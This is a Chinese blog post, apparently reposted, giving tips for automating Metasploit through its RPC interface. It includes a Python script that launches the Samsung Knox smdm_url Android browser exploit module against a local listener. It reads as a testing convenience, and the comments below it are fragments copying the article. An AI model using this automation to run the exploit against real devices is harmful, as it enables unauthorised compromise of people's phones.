Metasploit快速测试脚本的TIPS

黑客软件hacker2016-06-14 15:29:108304A⁺A^-

相信用过metasploit的同学都很苦逼，msfconsole漫长的启动时间，如果测试中敲错命令，或不小心退出后又重启任务，会让你直接抓狂。之前不想重复敲命令，看了下metasploit的开发文档，发现要自动化有各种方案，个人感觉最方便的是调用RPC接口，GITHUB上搜了把，发现有大拿封装好了模块，直接调用即可：安装pymetasploit模块

切到目录

sudo python setup.py install

复制代码

启动metasploit的RPC服务

msfrpcd -P test -n -f -a 127.0.0.1

复制代码

这个test是rpc服务的密码，用户名默认是msf

定制自己的测试脚本

我这里定制的是测试三星knox漏洞的脚本，思路是每次启动先把之前运行的job和console停掉，然后自动创建一个console自动敲入命令进行新的漏洞测试，直接crtl-c结束脚本再重新测试都是一个新的job，而且每次测试都是秒开，不用再重启msfconsole了。中间各种接口怎么用，推荐大家再翻下官方的文档。

from metasploit.msfrpc import MsfRpcClient
import time
client = MsfRpcClient('test')
jobs = client.call('job.list')
for num in jobs.keys():
if jobs[num].find('samsung_knox_smdm_url')>0:
client.call('job.stop',num)
console = client.call('console.list')
for _console in console['consoles']:
if _console.has_key('prompt'):
if _console['prompt'].find('samsung_knox_smdm_url')>0:
client.call('console.destroy', _console['id'])
cmd='''
use exploit/android/browser/samsung_knox_smdm_url
set LHOST 127.0.0.1
exploit
'''
res = client.call('console.create')
console_id = res['id']
client.call('console.write', console_id, cmd)
try:
while True:
res = client.call('console.read',console_id)
if len(res['data']) > 1:
print res['data'],
if res['busy'] == True:
time.sleep(1)
continue
except:
pass

点击这里复制本文地址以上内容由黑资讯整理呈现，请务必在转载分享时注明本文地址！如对内容有疑问，请联系我们，谢谢！

上一篇：MySql的like语句中的通配符：百分号、下划线和escape

下一篇：电脑显卡温度多少是正常的

4条评论

假欢邮友2022-06-01 21:28:49
: while True: res = client.call('console.read',console_id) &nb

只影玖橘2022-06-01 23:48:29
各种方案，个人感觉最方便的是调用RPC接口，GITHUB上搜了把，发现有大拿封装好了模块，直接调用即可：安装pymetasploit模块切到目录sudo python setup.py install复制代码启动

嘻友里赴2022-06-02 02:51:39
.0.1exploit'''res = client.call('console.create')console_id = res['id&#

可难粢醍2022-06-01 21:42:10
/browser/samsung_knox_smdm_urlset LHOST 127.0.0.1exploit'''res = client.call('console.create')conso

发表评论

Metasploit快速测试脚本的TIPS

相关文章